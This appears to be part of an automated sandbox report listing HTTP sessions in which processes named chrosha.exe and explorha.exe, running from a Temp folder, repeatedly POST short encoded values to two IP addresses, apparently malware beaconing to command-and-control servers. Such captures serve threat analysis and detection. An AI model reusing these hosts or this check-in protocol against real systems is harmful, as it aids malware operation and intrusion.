                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      801192.168.2.550649193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:39.563229084 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:39.814528942 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      802192.168.2.550650193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:39.992706060 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:40.239696980 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      803192.168.2.550651193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:40.177026987 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:40.421053886 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      804192.168.2.550652193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:40.490765095 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:40.740268946 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      805192.168.2.550653193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:40.669392109 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:40.919905901 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      806192.168.2.550654193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:41.103409052 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:41.343666077 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      807192.168.2.550655193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:41.274914980 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:41.519941092 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      808192.168.2.550656193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:41.592413902 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:41.840955973 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      809192.168.2.550657193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:41.775398970 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:42.031157017 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      810192.168.2.550658193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:42.198170900 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:42.444777012 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      811192.168.2.550659193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:42.388545036 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:42.640345097 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      812192.168.2.550660193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:42.694914103 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:42.943171978 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      813192.168.2.550661193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:42.892180920 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:43.145361900 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      814192.168.2.550662193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:43.302375078 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:43.546168089 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      815192.168.2.550663193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:43.518923998 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:43.767930031 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      816192.168.2.550664193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:43.791470051 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:44.038248062 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      817192.168.2.550665193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:44.024552107 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
